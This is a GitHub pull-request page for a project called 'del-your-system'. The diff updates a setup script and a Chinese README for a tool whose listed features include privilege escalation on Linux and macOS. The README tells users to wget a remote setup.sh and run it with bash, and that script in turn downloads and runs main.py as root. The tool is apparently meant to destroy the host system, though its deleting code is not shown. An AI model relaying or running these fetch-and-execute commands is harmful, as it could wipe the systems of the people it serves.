Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

V0.3 #3

Open
wants to merge 2 commits into
base: main
Choose a base branch
from
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
2 changes: 1 addition & 1 deletion Linux && macOS/setup.py → Linux && macOS/setup.sh
Original file line number Diff line number Diff line change
Expand Up @@ -29,7 +29,7 @@
python3 -V
mkdir /del
cd /del
wget https://raw.githubusercontent.com/SDCOM-0415/del-your-system/refs/heads/main/Linux%20%26%26%20macOS/main.py
wget https://raw.githubusercontent.com/SDCOM-0415/del-your-system/refs/heads/v0.3/Linux%20%26%26%20macOS/main.py
python3 main.py
}

Expand Down
10 changes: 7 additions & 3 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -11,9 +11,11 @@
- [x] 跨平台可用 ( Windows Linux macOS )
- [x] 针对于 Linux or macOS 操作系统的提权
- [ ] 针对于 Windows 系统的提权
- [ ] 脱离Python运行
- [ ] 针对于Linux的Shell脚本
- [x] 针对于Linux的Shell脚本
- [ ] 多系统整合为同一Python脚本
- [ ] 优化系统读取方案
- [ ] 适用于Windows的batch脚本
- [ ] 适用于macOS的shell(command)脚本
# 使用方法
1. 安装python的任意版本
2. 根据你的操作系统来选择下载
Expand All @@ -22,9 +24,11 @@
# Windows (使用管理员身份运行)
python main.py
# Linux
sudo python main.py
wget https://raw.githubusercontent.com/SDCOM-0415/del-your-system/refs/heads/v0.3/Linux%20%26%26%20macOS/setup.sh && bash ./setup.sh
```
# 版本更新日志
## v0.3
更新Linux shell脚本
## v0.2
实现命令的成功执行以及读取操作系统
## v0.1
Expand Down